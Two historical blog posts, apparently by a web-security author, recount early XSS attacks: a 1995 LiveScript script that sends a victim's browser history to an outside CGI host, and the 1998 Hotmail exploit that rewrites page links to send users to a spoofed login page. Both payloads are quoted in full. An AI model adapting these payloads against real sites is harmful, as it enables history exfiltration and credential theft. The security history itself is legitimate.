Here’s one of the earliest references to the threat of XSS from a message to the comp.sys.acorn.misc newsgroup on June 30, 1996.1 It mentions only a handful of possible outcomes:

    Another ‘application’ of JavaScript is to poke holes in Netscape’s security. To *anyone* using old versions of Netscape before 2.01 (including the beta versions) you can be at risk to malicious Javascript pages which can a) nick your history b) nick your email address c) download malicious files into your cache *and* run them (although you need to be coerced into pressing the button) d) examine your filetree.

    From that message we can go back several months to the announcement of Netscape Navigator 2.0 on September 18, 1995. A month later Netscape created a “Bugs Bounty” starting with its beta release in October. The bounty offered rewards, including a $1,000 first prize, to anyone who discovered and disclosed a security bug within the browser. A few weeks later the results were announced and first prize went to a nascent JavaScript hack.

    The winner of the bug hunt, Scott Weston, posted his find to an Aussie newsgroup. This was almost 15 years ago on December 1, 1995 (note that LiveScript was the precursor to JavaScript):

    The “LiveScript” that I wrote extracts ALL the history of the current netscape window. By history I mean ALL the pages that you have visited to get to my page, it then generates a string of these and forces the Netscape client to load a URL that is a CGI script with the QUERY_STRING set to the users History. The CGI script then adds this information to a log file.

    Scott, faithful to hackerdom tenets, included a pop-culture reference2 in his description of the sensitive data extracted about the unwitting victim:

    - the URL to use to get into CD-NOW as Johnny Mnemonic, including username and password. - The exact search params he used on Lycos (i.e. exactly what he searched for) - plus any other places he happened to visit.

    HTML injection targets insecure web applications. These were examples of how a successful attack could harm the victim rather than how a web site was hacked. Browser security is important to mitigate the impact of such attacks, but a browser’s fundamental purpose is to parse and execute HTML and JavaScript returned by a web application – a dangerous prospect when the page is laced with malicious content inserted by an attacker. The attack is almost indistinguishable from a modern payload. A real attack might only have used a more subtle <img> or <iframe> as opposed to changing the location.href:

    <SCRIPT LANGUAGE="LiveScript">
    i = 0
    yourHistory = ""
    while (i < history.length) {
      yourHistory += history[i]
      i++;
      if (i < history.length)
        yourHistory += "^"
      }
      location.href = "http://www.tripleg.com.au/cgi-bin/scott/his?" + yourHistory
      <!-- hahah here is the hidden script --></i>
    </SCRIPT>
    

    The actual exploit reflected the absurd simplicity typical of XSS attacks. They often require little effort to create, but carry a significant impact. This differs greatly from binary exploits (e.g. heap and buffer overflows) that require days, weeks, or months to develop.

Before closing let’s take a tangential look at the original $1,000 “Bugs Bounty”. Today, the Chromium team offers $500 and $1,337 rewards3 for security-related bugs. The Mozilla Foundation offers $500 and a T-Shirt.

    On the other hand, you can keep the security bug from the browser developers and earn $10,000 and a laptop for a nice, working exploit.

    Come to think of it…those options seem like a superior hourly rate to writing a book. And I cringe at the difference if you compare rates based on word count.


    1. Netscape Navigator 3.0 was already available in April of the same year. 

    2. Good luck tracking down the May 1981 issue of Omni Magazine in which William Gibson’s short story first appeared! 

3. No, the extra $337 isn’t the adjustment for inflation from 1995, which would have made it $1,407.72 according to the Bureau of Labor Statistics. It’s one of those numbers that, if you have to ask, you risk exposing yourself as a n00b. Don’t ask about that one either. 

    * * *
  • My book starts off with a discussion of cross-site scripting (XSS) attacks along with examples from 2009 that illustrate the simplicity of these attacks and the significant impact they can have. What’s astonishing is how little many of the attacks have changed. Consider the following example, over a decade old, of HTML injection before terms like XSS became so ubiquitous. The exploit appeared about two years before the blanket CERT advisory that called attention to insecurity of unchecked HTML.

On August 24, 1998 a Canadian web developer, Tom Cervenka, posted a message to the comp.lang.javascript newsgroup that claimed:

    We have just found a serious security hole in Microsoft’s Hotmail service (https://www.hotmail.com/) which allows malicious users to easily steal the passwords of Hotmail users.

    The exploit involves sending an e-mail message that contains embedded javascript code. When a Hotmail user views the message, the javascript code forces the user to re-login to Hotmail. In doing so, the victim’s username and password is sent to the malicious user by e-mail.

[Screenshot: the spoofed Hotmail login page]

The discoverers, in apparent ignorance of the 1990s labeling requirements for hacks to include foul language or numeric characters, simply dubbed it the “Hot”Mail Exploit. (They also neglected the era’s disclosure methodologies by omitting greetz, lacking typos, and failing to remind the reader of near-omnipotent skills – surely an anomaly at the time. The hacker did not fail on all aspects. He satisfied the Axiom of Hacking Culture by choosing a name, Blue Adept, that referenced pop culture, in this case the title of a fantasy novel by Piers Anthony.)

    The attack required two steps. First, they set up a page on Geocities (a hosting service for web pages distinguished by being free before free was co-opted by the Web 2.0 fad) that spoofed Hotmail’s login.

    The attack wasn’t particularly sophisticated, but it didn’t need to be. The login form collected the victim’s login name and password then mailed them, along with the victim’s IP address, to the newly-created Geocities account.

    The second step involved executing the actual exploit against Hotmail by sending an email with HTML that contained a rather curious img tag:

    <img src="javascript:errurl='http://www.because-we-can.com/users/anon/hotmail/getmsg.htm';
    nomenulinks=top.submenu.document.links.length;
    for(i=0;i<nomenulinks-1;i++){top.submenu.document.links[i].target='work';
    top.submenu.document.links[i].href=errurl;}
    noworklinks=top.work.document.links.length;
    for(i=0;i<noworklinks-1;i++){top.work.document.links[i].target='work';
    top.work.document.links[i].href=errurl;}">
    

    The JavaScript changed the browser’s DOM such that any click would take the victim to the spoofed login page at which point the authentication credentials would be coaxed from the unwitting visitor. The original payload didn’t bother to obfuscate the JavaScript inside the src attribute. Modern attacks have more sophisticated obfuscation techniques and use tags other than the img element. The problem of HTML injection, although well known for over 10 years, remains a significant attack against web applications.

    * * *